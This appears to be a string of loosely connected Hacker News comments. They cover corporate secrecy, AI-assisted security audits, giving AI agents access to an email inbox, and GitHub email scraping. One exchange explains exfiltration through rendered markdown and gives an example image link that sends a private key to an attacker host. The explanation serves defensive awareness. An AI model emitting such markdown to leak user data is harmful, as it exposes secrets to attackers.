They have rate limiting rules but they aren't on by default and are separate from the WAF which is mostly stateless.

Doesn't seem so crazy if the point is to avoid leaking new features, models, codenames, etc.

Where the hell are people getting this idea that it's ok to be deceptive because they are keeping secrets?

No shit they have secrets. I have secrets too. That doesn't make it ok for me to deceive you in any way.

How would you feel if I deceived you and my excuse was "oh I was just trying some new secret technique of mine"?

How did we get to this point where we let enormously powerful companies get away with more than individuals?

The feature seems pretty obviously for Anthropic employees who are using unreleased models internally and do not want to leak any details in public commit messages.

IMHO host mismatch is more serious than expired cert and browsers should treat it as such

Outside of their (hard to buy) GLM 4.7 coding plans, it's also extremely expensive.

Troubleshooting "works on my machine" issues most be fun when no two people have exactly the same implementation.

Also seems like this will further entrench the top 2 or 3 models. Use something else and your software stack looks different.

It depends whether anyone was ever actually going to spend that week doing it the "hard" way. Having Claude do it in a few minutes beats doing nothing.

Put another way: I absolutely would have an intern work on a security audit. I would not have an intern replace a professional audit though.

It's otherwise a pretty low stakes use. I'd expect false positives to be pretty obvious to someone maintaining the code.

My point is that it’s one thing to say I want my intern to start doing a security audit.

It’s another thing to say hey intern security audit this entire code base.

LLM’s thrive on context. You need the right context at the right time, it doesn’t matter how good your model is if you don’t have that.

Why would a tool that works need to dissuade skeptics from trying it?

Based on his twitter he may just like irony/meta posting a little too much like a lot of modern culture

Neither side wants that so seems pretty unlikely

You still have to trust your executive assistant. I would never give someone I don't trust the ability to read and write emails for me.

If this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They have permissions for non destructive actions like reading mails, flagging important mails, creating drafts, moving to trash, but not more.

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.

> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?

Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def

Not hypothetical: https://checkmarx.com/zero-post/exploiting-markdown-injectio...

Yes. It’s kind of like giving power of attorney to Jeffery Epstein.

Seems to be working out alright for old Wexner.

How would you know whether the account that did the scraping was banned?

By visiting the account and noticing that it still has activity long after the report.

Half the time they literally say it in the email. I just looked in my spam folder and just a few hours ago got an email titled "Your profile: Github", that started with:

> I came across your profile on GitHub. Given you're based in the US, I thought it might be relevant to reach out. > > Profile: https://github.com/tedivm

They aren't doing anything to hide it.

But hold on.

They could have git cloned your repo, used or otherwise analyzed your code which follows TOS then used the local git repo to pull your email address.

How is GitHub responsible here?

They could have, but it seems unlikely they targeted one or two repos and probably cloned thousands or more.

That identifies the company that sent the email not the github account that scraped it

GH literally say in a parent comment:

> we can (and do) take action against those accounts including banning the accounts

That they use some of their trillion dollar marketshare to solve it, why are you acting like this is a hard problem? It's not. They're just too cheap and greedy to do anything about it.

Trillion dollar marketshare? How big do you think GitHub is?

GitHub is wholly owned by Microsoft, which has a 3 trillion market cap

When I left, GH was valued at around $40 billion. Above the $8B they were purchased for. Well below $1T that is claimed

Even if they were valued around $100million they would still have more enough resources to solve this problem. Stop excusing companies that hate hiring people and are so greedy they would rather punt this problem to the commons fucking over an entire community that literally enabled them to exist.

Come on here, even Meta hires people in Kenya to look at CP and snuff films to label this stuff. Meta! They literally profited off of a genocide and they still know how to do this.

Excuse after excuse for these greedy companies.

One would expect people on Hacker News to know that a single business division doesn't have direct access to the funds of other business divisions of the same corporation.

One would expect people on HN should know that companies subsidize failing BU all the time with their profitable BUs.

Sorry but why are you making excuses for these insanely greedy companies that don't want to hire people to solve a basic problem?

How small do you think Microsoft is??!

GitHub is not all of Microsoft.